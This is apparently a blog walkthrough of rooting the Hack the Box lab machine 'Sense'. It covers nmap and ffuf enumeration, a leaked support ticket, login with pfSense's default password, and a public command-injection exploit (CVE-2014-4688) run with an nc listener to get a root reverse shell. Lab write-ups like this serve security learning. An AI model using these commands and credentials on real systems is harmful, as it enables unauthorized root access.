Hack the Box - Sense Walkthrough

Hack the Box - Sense Walkthrough

This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.

You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.

Hello Everyone!

Today we are going to look the steps I followed to get root on Sense, a vulnerable machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.

Scanning and Enumeration

I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:

# Basic Nmap Scan
sudo nmap -sSVC $TGT

Host is up (0.087s latency).
Not shown: 998 filtered tcp ports (no-response)
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35

The nmap results plus a manual inspection showed the presence of Pfsense on ports 80 and 443, as well as Lighttpd version 1.4.35 on the same ports.

I checked for the pfsense default username/password combination plus some other default combinations but none of them worked.

To explore potential vulnerabilities, I used searchsploit for both Pfsense and Lighttpd:

searchsploit pfsense | grep -v Cros
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
pfSense - (Authenticated) Group Member Remote Command Execut | unix/remote/43193.rb
pfSense 2.1 build 20130911-1816 - Directory Traversal        | php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities                       | php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal                          | php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution                          | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection             | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injecti | php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities   | php/webapps/39709.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

searchsploit lighttpd
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC)                           | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Servic | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Exe | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Exe | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC)                    | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure          | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Se | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure     | multiple/remote/8786.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Web Server Enumeration

Next, I initiated an ffuf scan to uncover hidden directories on the target web server:

ffuf -w $wordlist -u https://$TGT/FUZZ -e "/,.php,.txt" --replay-proxy

The ffuf scan revealed a file named /system-users.txt through directory browsing. After inspecting its contents, I discovered the following information:

####Support ticket###
Please create the following user

username: Rohit
password: company defaults

Exploiting Pfsense Vulnerability

Having this information, and knowing that Pfsense's default password is "pfsense" I connected to the Pfsense system using the credentials:

# Connecting with Pfsense
user: rohit
password: pfsense

Upon successful connection, I identified the Pfsense version as:

2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16

Now that I had a set of valid credentials I went back to the searchsploit results I revisited the "pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection" vulnerability and its corresponding exploit: https://www.exploit-db.com/exploits/43560

head 43560.py 

#!/usr/bin/env python3

# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688

Exploitation and Root Access

The script exploited the vulnerability 'pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.' After setting up a listener, the script was executed to gain root access:

# Start Listener
nc -nlvp 7777

# Run Exploit
python /home/htb-ragab0t/43560.py --rhost $TGT --lhost $LHOST --lport 7777 --username rohit --password pfsense

The successful execution of the exploit granted root access to the target system:

# Confirming Root Access
# Checking User ID
uid=0(root) gid=0(wheel) groups=0(wheel)

And that's it for now. Until next time :)


PS: If you're eager to dive into the art of hacking techniques, I highly recommend joining me on Hack the Box Academy through my referral link. Let's level up our skills together. See you there!